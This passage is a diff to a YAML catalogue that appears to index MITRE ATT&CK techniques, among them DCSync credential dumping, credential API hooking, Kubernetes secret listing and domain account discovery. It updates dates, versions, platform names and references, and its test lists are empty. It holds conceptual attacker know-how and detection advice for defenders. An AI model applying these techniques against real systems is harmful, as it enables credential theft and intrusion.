         description: Schroeder, W. (2016, November 1). Kerberoasting Without Mimikatz.
-          Retrieved March 23, 2018.
-        url: https://www.harmj0y.net/blog/powershell/kerberoasting-without-mimikatz/
+          Retrieved September 23, 2024.
+        url: https://blog.harmj0y.net/powershell/kerberoasting-without-mimikatz/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1558.003
     atomic_tests: []
   T1003.006:
     technique:
-      x_mitre_platforms:
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - ExtraHop
-      - Vincent Le Toux
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--f303a39a-6255-4b89-aecc-18c4d8ca7163
-      type: attack-pattern
-      created: '2020-02-11T18:45:34.293Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1003.006
-        url: https://attack.mitre.org/techniques/T1003/006
-      - url: https://msdn.microsoft.com/library/cc228086.aspx
-        description: Microsoft. (2017, December 1). MS-DRSR Directory Replication
-          Service (DRS) Remote Protocol. Retrieved December 4, 2017.
-        source_name: Microsoft DRSR Dec 2017
-      - url: https://msdn.microsoft.com/library/dd207691.aspx
-        description: Microsoft. (n.d.). IDL_DRSGetNCChanges (Opnum 3). Retrieved December
-          4, 2017.
-        source_name: Microsoft GetNCCChanges
-      - url: https://wiki.samba.org/index.php/DRSUAPI
-        description: SambaWiki. (n.d.). DRSUAPI. Retrieved December 4, 2017.
-        source_name: Samba DRSUAPI
-      - url: https://source.winehq.org/WineAPI/samlib.html
-        description: Wine API. (n.d.). samlib.dll. Retrieved December 4, 2017.
-        source_name: Wine API samlib.dll
-      - url: https://adsecurity.org/?p=1729
-        description: Metcalf, S. (2015, September 25). Mimikatz DCSync Usage, Exploitation,
-          and Detection. Retrieved August 7, 2017.
-        source_name: ADSecurity Mimikatz DCSync
-      - url: http://www.harmj0y.net/blog/redteaming/mimikatz-and-dcsync-and-extrasids-oh-my/
-        description: Schroeder, W. (2015, September 22). Mimikatz and DCSync and ExtraSids,
-          Oh My. Retrieved August 7, 2017.
-        source_name: Harmj0y Mimikatz and DCSync
-      - url: https://blog.stealthbits.com/manipulating-user-passwords-with-mimikatz-SetNTLM-ChangeNTLM
-        description: Warren, J. (2017, July 11). Manipulating User Passwords with
-          Mimikatz. Retrieved December 4, 2017.
-        source_name: InsiderThreat ChangeNTLM July 2017
-      - url: https://github.com/gentilkiwi/mimikatz/wiki/module-~-lsadump
-        description: Deply, B., Le Toux, V. (2016, June 5). module ~ lsadump. Retrieved
-          August 7, 2017.
-        source_name: GitHub Mimikatz lsadump Module
-      - url: https://msdn.microsoft.com/library/cc237008.aspx
-        description: Microsoft. (2017, December 1). MS-NRPC - Netlogon Remote Protocol.
-          Retrieved December 6, 2017.
-        source_name: Microsoft NRPC Dec 2017
-      - url: https://msdn.microsoft.com/library/cc245496.aspx
-        description: Microsoft. (n.d.). MS-SAMR Security Account Manager (SAM) Remote
-          Protocol (Client-to-Server) - Transport. Retrieved December 4, 2017.
-        source_name: Microsoft SAMR
-      - url: https://adsecurity.org/?p=1729
-        description: Metcalf, S. (2015, September 25). Mimikatz DCSync Usage, Exploitation,
-          and Detection. Retrieved December 4, 2017.
-        source_name: AdSecurity DCSync Sept 2015
-      - url: http://www.harmj0y.net/blog/redteaming/mimikatz-and-dcsync-and-extrasids-oh-my/
-        description: Schroeder, W. (2015, September 22). Mimikatz and DCSync and ExtraSids,
-          Oh My. Retrieved December 4, 2017.
-        source_name: Harmj0y DCSync Sept 2015
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-10-15T15:54:08.312Z'
       name: 'OS Credential Dumping: DCSync'
       description: |-
         Adversaries may attempt to access credentials and other sensitive information by abusing a Windows Domain Controller's application programming interface (API)(Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft GetNCCChanges) (Citation: Samba DRSUAPI) (Citation: Wine API samlib.dll) to simulate the replication process from a remote domain controller using a technique called DCSync.
@@ -49307,26 +49969,88 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_contributors:
+      - ExtraHop
+      - Vincent Le Toux
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor domain controller logs for replication requests and other unscheduled activity possibly associated with DCSync.(Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft GetNCCChanges) (Citation: Samba DRSUAPI) Also monitor for network protocols(Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft NRPC Dec 2017) and other replication requests(Citation: Microsoft SAMR) from IPs not associated with known domain controllers.(Citation: AdSecurity DCSync Sept 2015)
 
         Note: Domain controllers may not log replication requests originating from the default domain controller account.(Citation: Harmj0y DCSync Sept 2015)
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Active Directory: Active Directory Object Access'
       - 'Network Traffic: Network Traffic Content'
       - 'Network Traffic: Network Traffic Flow'
-      x_mitre_permissions_required:
-      - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--f303a39a-6255-4b89-aecc-18c4d8ca7163
+      created: '2020-02-11T18:45:34.293Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1003/006
+        external_id: T1003.006
+      - source_name: GitHub Mimikatz lsadump Module
+        description: Deply, B., Le Toux, V. (2016, June 5). module ~ lsadump. Retrieved
+          August 7, 2017.
+        url: https://github.com/gentilkiwi/mimikatz/wiki/module-~-lsadump
+      - source_name: ADSecurity Mimikatz DCSync
+        description: Metcalf, S. (2015, September 25). Mimikatz DCSync Usage, Exploitation,
+          and Detection. Retrieved August 7, 2017.
+        url: https://adsecurity.org/?p=1729
+      - source_name: AdSecurity DCSync Sept 2015
+        description: Metcalf, S. (2015, September 25). Mimikatz DCSync Usage, Exploitation,
+          and Detection. Retrieved December 4, 2017.
+        url: https://adsecurity.org/?p=1729
+      - source_name: Microsoft DRSR Dec 2017
+        description: Microsoft. (2017, December 1). MS-DRSR Directory Replication
+          Service (DRS) Remote Protocol. Retrieved December 4, 2017.
+        url: https://msdn.microsoft.com/library/cc228086.aspx
+      - source_name: Microsoft NRPC Dec 2017
+        description: Microsoft. (2017, December 1). MS-NRPC - Netlogon Remote Protocol.
+          Retrieved December 6, 2017.
+        url: https://msdn.microsoft.com/library/cc237008.aspx
+      - source_name: Microsoft GetNCCChanges
+        description: Microsoft. (n.d.). IDL_DRSGetNCChanges (Opnum 3). Retrieved December
+          4, 2017.
+        url: https://msdn.microsoft.com/library/dd207691.aspx
+      - source_name: Microsoft SAMR
+        description: Microsoft. (n.d.). MS-SAMR Security Account Manager (SAM) Remote
+          Protocol (Client-to-Server) - Transport. Retrieved December 4, 2017.
+        url: https://msdn.microsoft.com/library/cc245496.aspx
+      - source_name: Samba DRSUAPI
+        description: SambaWiki. (n.d.). DRSUAPI. Retrieved December 4, 2017.
+        url: https://wiki.samba.org/index.php/DRSUAPI
+      - source_name: Harmj0y DCSync Sept 2015
+        description: Schroeder, W. (2015, September 22). Mimikatz and DCSync and ExtraSids,
+          Oh My. Retrieved December 4, 2017.
+        url: http://www.harmj0y.net/blog/redteaming/mimikatz-and-dcsync-and-extrasids-oh-my/
+      - source_name: Harmj0y Mimikatz and DCSync
+        description: Schroeder, W. (2015, September 22). Mimikatz and DCSync and ExtraSids,
+          Oh My. Retrieved September 23, 2024.
+        url: https://blog.harmj0y.net/redteaming/mimikatz-and-dcsync-and-extrasids-oh-my/
+      - source_name: InsiderThreat ChangeNTLM July 2017
+        description: Warren, J. (2017, July 11). Manipulating User Passwords with
+          Mimikatz. Retrieved December 4, 2017.
+        url: https://blog.stealthbits.com/manipulating-user-passwords-with-mimikatz-SetNTLM-ChangeNTLM
+      - source_name: Wine API samlib.dll
+        description: Wine API. (n.d.). samlib.dll. Retrieved December 4, 2017.
+        url: https://source.winehq.org/WineAPI/samlib.html
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1003.006
     atomic_tests: []
   T1556:
     technique:
-      modified: '2024-04-11T21:51:44.851Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Modify Authentication Process
       description: |-
         Adversaries may modify authentication mechanisms and processes to access user credentials or enable otherwise unwarranted access to accounts. The authentication process is handled by mechanisms, such as the Local Security Authentication Server (LSASS) process and the Security Accounts Manager (SAM) on Windows, pluggable authentication modules (PAM) on Unix-based systems, and authorization plugins on MacOS systems, responsible for gathering, storing, and validating credentials. By modifying an authentication process, an adversary may be able to authenticate to a service or system without using [Valid Accounts](https://attack.mitre.org/techniques/T1078).
@@ -49339,6 +50063,7 @@ credential-access:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Chris Ross @xorrior
       x_mitre_deprecated: false
@@ -49375,17 +50100,17 @@ credential-access:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
       - Linux
       - macOS
       - Network
-      - Azure AD
-      - Google Workspace
       - IaaS
-      - Office 365
       - SaaS
-      x_mitre_version: '2.4'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '2.5'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'Process: Process Access'
@@ -49431,81 +50156,10 @@ credential-access:
         url: https://technet.microsoft.com/en-us/library/dn487457.aspx
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1056.004:
     technique:
-      x_mitre_platforms:
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--f5946b5e-9408-485f-a7f7-b5efc88909b6
-      type: attack-pattern
-      created: '2020-02-11T19:01:15.930Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1056.004
-        url: https://attack.mitre.org/techniques/T1056/004
-      - source_name: Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017
-        description: Microsoft. (2017, September 15). TrojanSpy:Win32/Ursnif.gen!I.
-          Retrieved December 18, 2017.
-        url: https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanSpy:Win32/Ursnif.gen!I&threatId=-2147336918
-      - url: https://msdn.microsoft.com/library/windows/desktop/ms644959.aspx
-        description: Microsoft. (n.d.). Hooks Overview. Retrieved December 12, 2017.
-        source_name: Microsoft Hook Overview
-      - url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process
-        description: 'Hosseini, A. (2017, July 18). Ten Process Injection Techniques:
-          A Technical Survey Of Common And Trending Process Injection Techniques.
-          Retrieved December 7, 2017.'
-        source_name: Elastic Process Injection July 2017
-      - url: https://www.adlice.com/userland-rootkits-part-1-iat-hooks/
-        description: 'Tigzy. (2014, October 15). Userland Rootkits: Part 1, IAT hooks.
-          Retrieved December 12, 2017.'
-        source_name: Adlice Software IAT Hooks Oct 2014
-      - url: https://www.mwrinfosecurity.com/our-thinking/dynamic-hooking-techniques-user-mode/
-        description: 'Hillman, M. (2015, August 8). Dynamic Hooking Techniques: User
-          Mode. Retrieved December 20, 2017.'
-        source_name: MWRInfoSecurity Dynamic Hooking 2015
-      - url: https://www.exploit-db.com/docs/17802.pdf
-        description: Mariani, B. (2011, September 6). Inline Hooking in Windows. Retrieved
-          December 12, 2017.
-        source_name: HighTech Bridge Inline Hooking Sept 2011
-      - url: https://volatility-labs.blogspot.com/2012/09/movp-31-detecting-malware-hooks-in.html
-        description: Volatility Labs. (2012, September 24). MoVP 3.1 Detecting Malware
-          Hooks in the Windows GUI Subsystem. Retrieved December 12, 2017.
-        source_name: Volatility Detecting Hooks Sept 2012
-      - url: https://github.com/prekageo/winhook
-        description: Prekas, G. (2011, July 11). Winhook. Retrieved December 12, 2017.
-        source_name: PreKageo Winhook Jul 2011
-      - url: https://github.com/jay/gethooks
-        description: Satiro, J. (2011, September 14). GetHooks. Retrieved December
-          12, 2017.
-        source_name: Jay GetHooks Sept 2011
-      - url: https://zairon.wordpress.com/2006/12/06/any-application-defined-hook-procedure-on-my-machine/
-        description: Felici, M. (2006, December 6). Any application-defined hook procedure
-          on my machine?. Retrieved December 12, 2017.
-        source_name: Zairon Hooking Dec 2006
-      - url: https://eyeofrablog.wordpress.com/2017/06/27/windows-keylogger-part-2-defense-against-user-land/
-        description: 'Eye of Ra. (2017, June 27). Windows Keylogger Part 2: Defense
-          against user-land. Retrieved December 12, 2017.'
-        source_name: EyeofRa Detecting Hooking June 2017
-      - url: http://www.gmer.net/
-        description: GMER. (n.d.). GMER. Retrieved December 12, 2017.
-        source_name: GMER Rootkits
-      - url: https://msdn.microsoft.com/library/windows/desktop/ms686701.aspx
-        description: Microsoft. (n.d.). Taking a Snapshot and Viewing Processes. Retrieved
-          December 12, 2017.
-        source_name: Microsoft Process Snapshot
-      - url: https://security.stackexchange.com/questions/17904/what-are-the-methods-to-find-hooked-functions-and-apis
-        description: Stack Exchange - Security. (2012, July 31). What are the methods
-          to find hooked functions and APIs?. Retrieved December 12, 2017.
-        source_name: StackExchange Hooks Jul 2012
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-08-27T21:03:56.385Z'
       name: 'Input Capture: Credential API Hooking'
       description: |
         Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.(Citation: Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017) Unlike [Keylogging](https://attack.mitre.org/techniques/T1056/001),  this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
@@ -49518,28 +50172,94 @@ credential-access:
         phase_name: collection
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor for calls to the `SetWindowsHookEx` and `SetWinEventHook` functions, which install a hook procedure.(Citation: Microsoft Hook Overview)(Citation: Volatility Detecting Hooks Sept 2012) Also consider analyzing hook chains (which hold pointers to hook procedures for each type of hook) using tools(Citation: Volatility Detecting Hooks Sept 2012)(Citation: PreKageo Winhook Jul 2011)(Citation: Jay GetHooks Sept 2011) or by programmatically examining internal kernel structures.(Citation: Zairon Hooking Dec 2006)(Citation: EyeofRa Detecting Hooking June 2017)
 
         Rootkits detectors(Citation: GMER Rootkits) can also be used to monitor for various types of hooking activity.
 
         Verify integrity of live processes by comparing code in memory to that of corresponding static binaries, specifically checking for jumps and other instructions that redirect code flow. Also consider taking snapshots of newly started processes(Citation: Microsoft Process Snapshot) to compare the in-memory IAT to the real addresses of the referenced functions.(Citation: StackExchange Hooks Jul 2012)(Citation: Adlice Software IAT Hooks Oct 2014)
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Process: Process Metadata'
       - 'Process: OS API Execution'
-      x_mitre_permissions_required:
-      - Administrator
-      - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--f5946b5e-9408-485f-a7f7-b5efc88909b6
+      created: '2020-02-11T19:01:15.930Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1056/004
+        external_id: T1056.004
+      - source_name: EyeofRa Detecting Hooking June 2017
+        description: 'Eye of Ra. (2017, June 27). Windows Keylogger Part 2: Defense
+          against user-land. Retrieved December 12, 2017.'
+        url: https://eyeofrablog.wordpress.com/2017/06/27/windows-keylogger-part-2-defense-against-user-land/
+      - source_name: Zairon Hooking Dec 2006
+        description: Felici, M. (2006, December 6). Any application-defined hook procedure
+          on my machine?. Retrieved December 12, 2017.
+        url: https://zairon.wordpress.com/2006/12/06/any-application-defined-hook-procedure-on-my-machine/
+      - source_name: GMER Rootkits
+        description: GMER. (n.d.). GMER. Retrieved December 12, 2017.
+        url: http://www.gmer.net/
+      - source_name: MWRInfoSecurity Dynamic Hooking 2015
+        description: 'Hillman, M. (2015, August 8). Dynamic Hooking Techniques: User
+          Mode. Retrieved December 20, 2017.'
+        url: https://www.mwrinfosecurity.com/our-thinking/dynamic-hooking-techniques-user-mode/
+      - source_name: Elastic Process Injection July 2017
+        description: 'Hosseini, A. (2017, July 18). Ten Process Injection Techniques:
+          A Technical Survey Of Common And Trending Process Injection Techniques.
+          Retrieved December 7, 2017.'
+        url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process
+      - source_name: HighTech Bridge Inline Hooking Sept 2011
+        description: Mariani, B. (2011, September 6). Inline Hooking in Windows. Retrieved
+          December 12, 2017.
+        url: https://www.exploit-db.com/docs/17802.pdf
+      - source_name: Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017
+        description: Microsoft. (2017, September 15). TrojanSpy:Win32/Ursnif.gen!I.
+          Retrieved December 18, 2017.
+        url: https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanSpy:Win32/Ursnif.gen!I&threatId=-2147336918
+      - source_name: Microsoft Hook Overview
+        description: Microsoft. (n.d.). Hooks Overview. Retrieved December 12, 2017.
+        url: https://msdn.microsoft.com/library/windows/desktop/ms644959.aspx
+      - source_name: Microsoft Process Snapshot
+        description: Microsoft. (n.d.). Taking a Snapshot and Viewing Processes. Retrieved
+          December 12, 2017.
+        url: https://msdn.microsoft.com/library/windows/desktop/ms686701.aspx
+      - source_name: PreKageo Winhook Jul 2011
+        description: Prekas, G. (2011, July 11). Winhook. Retrieved December 12, 2017.
+        url: https://github.com/prekageo/winhook
+      - source_name: Jay GetHooks Sept 2011
+        description: Satiro, J. (2011, September 14). GetHooks. Retrieved December
+          12, 2017.
+        url: https://github.com/jay/gethooks
+      - source_name: StackExchange Hooks Jul 2012
+        description: Stack Exchange - Security. (2012, July 31). What are the methods
+          to find hooked functions and APIs?. Retrieved December 12, 2017.
+        url: https://security.stackexchange.com/questions/17904/what-are-the-methods-to-find-hooked-functions-and-apis
+      - source_name: Adlice Software IAT Hooks Oct 2014
+        description: 'Tigzy. (2014, October 15). Userland Rootkits: Part 1, IAT hooks.
+          Retrieved December 12, 2017.'
+        url: https://www.adlice.com/userland-rootkits-part-1-iat-hooks/
+      - source_name: Volatility Detecting Hooks Sept 2012
+        description: Volatility Labs. (2012, September 24). MoVP 3.1 Detecting Malware
+          Hooks in the Windows GUI Subsystem. Retrieved December 12, 2017.
+        url: https://volatility-labs.blogspot.com/2012/09/movp-31-detecting-malware-hooks-in.html
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1056.004
     atomic_tests: []
   T1552.007:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2024-10-15T16:25:28.820Z'
       name: Kubernetes List Secrets
       description: "Adversaries may gather credentials via APIs within a containers
         environment. APIs in these environments, such as the Docker API and Kubernetes
@@ -49596,9 +50316,8 @@ credential-access:
         url: https://kubernetes.io/docs/concepts/overview/kubernetes-api/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1552.007
     atomic_tests: []
   T1556.004:
@@ -49629,7 +50348,7 @@ credential-access:
         url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#13
         description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco
           IOS Run-Time Memory Integrity Verification. Retrieved October 19, 2020.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2021-12-14T23:14:26.107Z'
       name: Network Device Authentication
       description: |-
         Adversaries may use [Patch System Image](https://attack.mitre.org/techniques/T1601/001) to hard code a password in the operating system, thus bypassing of native authentication mechanisms for local accounts on network devices.
@@ -49653,8 +50372,6 @@ credential-access:
       - 'File: File Modification'
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
 discovery:
   T1033:
@@ -49719,12 +50436,11 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1033
     atomic_tests: []
   T1613:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-15T16:08:50.706Z'
       name: Container and Resource Discovery
       description: "Adversaries may attempt to discover containers and other resources
         that are available within a containers environment. Other resources may include
@@ -49783,7 +50499,6 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1613
     atomic_tests: []
   T1016.001:
@@ -49804,7 +50519,7 @@ discovery:
       - source_name: mitre-attack
         external_id: T1016.001
         url: https://attack.mitre.org/techniques/T1016/001
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-03-25T17:03:26.632Z'
       name: 'System Network Configuration Discovery: Internet Connection Discovery'
       description: |-
         Adversaries may check for Internet connectivity on compromised systems. This may be performed during automated discovery and can be accomplished in numerous ways such as using [Ping](https://attack.mitre.org/software/S0097), <code>tracert</code>, and GET requests to websites.
@@ -49825,13 +50540,11 @@ discovery:
       - 'Command: Command Execution'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1016.001
     atomic_tests: []
   T1069:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T16:03:06.294Z'
       name: Permission Groups Discovery
       description: |-
         Adversaries may attempt to discover group and permission settings. This information can help adversaries determine which user accounts and groups are available, the membership of users in particular groups, and which users and groups have elevated permissions.
@@ -49854,15 +50567,14 @@ discovery:
       x_mitre_is_subtechnique: false
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
       - Containers
-      x_mitre_version: '2.5'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '2.6'
       x_mitre_data_sources:
       - 'Process: Process Creation'
       - 'Group: Group Metadata'
@@ -49888,13 +50600,12 @@ discovery:
         url: https://www.crowdstrike.com/blog/hidden-administrative-accounts-bloodhound-to-the-rescue/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1069.003:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T15:51:35.759Z'
       name: Cloud Groups
       description: |-
         Adversaries may attempt to find cloud groups and permission settings. The knowledge of cloud permission groups can help adversaries determine the particular roles of users and groups within an environment, as well as which users are associated with a particular group.
@@ -49919,12 +50630,11 @@ discovery:
       - enterprise-attack
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
-      - Google Workspace
-      x_mitre_version: '1.4'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.5'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'Application Log: Application Log Content'
@@ -49966,13 +50676,12 @@ discovery:
         url: https://github.com/True-Demon/raindance
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1615:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-01-06T12:41:08.579Z'
       name: Group Policy Discovery
       description: |-
         Adversaries may gather information on Group Policy settings to identify paths for privilege escalation, security measures applied within a domain, and to discover patterns in domain objects that can be manipulated or used to blend in the environment. Group Policy allows for centralized management of user and computer settings in Active Directory (AD). Group policy objects (GPOs) are containers for group policy settings made up of files stored within a predictable network path `\<DOMAIN>\SYSVOL\<DOMAIN>\Policies\`.(Citation: TechNet Group Policy Basics)(Citation: ADSecurity GPO Persistence 2016)
@@ -50033,12 +50742,11 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1615
     atomic_tests: []
   T1652:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2023-05-04T18:07:16.804Z'
       name: Device Driver Discovery
       description: |-
         Adversaries may attempt to enumerate local device drivers on a victim host. Information about device drivers may highlight various insights that shape follow-on behaviors, such as the function/purpose of the host, present security tools (i.e. [Security Software Discovery](https://attack.mitre.org/techniques/T1518/001)) or other defenses (e.g., [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497)), as well as potential exploitable vulnerabilities (e.g., [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068)).
@@ -50102,19 +50810,18 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1652
     atomic_tests: []
   T1087.002:
     technique:
-      modified: '2024-04-15T21:33:57.732Z'
+      modified: '2024-05-31T04:00:37.651Z'
       name: 'Account Discovery: Domain Account'
       description: "Adversaries may attempt to get a listing of domain accounts. This
         information can help adversaries determine which domain accounts exist to
         aid in follow-on behavior such as targeting specific accounts which possess
         particular privileges.\n\nCommands such as <code>net user /domain</code> and
         <code>net group /domain</code> of the [Net](https://attack.mitre.org/software/S0039)
-        utility, <code>dscacheutil -q group</code>on macOS, and <code>ldapsearch</code>
+        utility, <code>dscacheutil -q group</code> on macOS, and <code>ldapsearch</code>
         on Linux can list domain users and groups. [PowerShell](https://attack.mitre.org/techniques/T1059/001)
         cmdlets including <code>Get-ADUser</code> and <code>Get-ADGroupMember</code>
         may enumerate members of Active Directory groups.(Citation: CrowdStrike StellarParticle
@@ -50161,7 +50868,6 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1087.002
     atomic_tests: []
   T1087.001:
@@ -50228,12 +50934,11 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1087.001
     atomic_tests: []
   T1497.001:
     technique:
-      modified: '2024-04-19T12:49:40.919Z'
+      modified: '2024-09-12T15:50:18.047Z'
       name: 'Virtualization/Sandbox Evasion: System Checks'
       description: "Adversaries may employ various system checks to detect and avoid
         virtualization and analysis environments. This may include changing behaviors
@@ -50323,18 +51028,17 @@ discovery:
         url: https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/stopping-malware-fake-virtual-machine/
       - source_name: Deloitte Environment Awareness
         description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
-          May 18, 2021.
-        url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc
+          September 13, 2024.
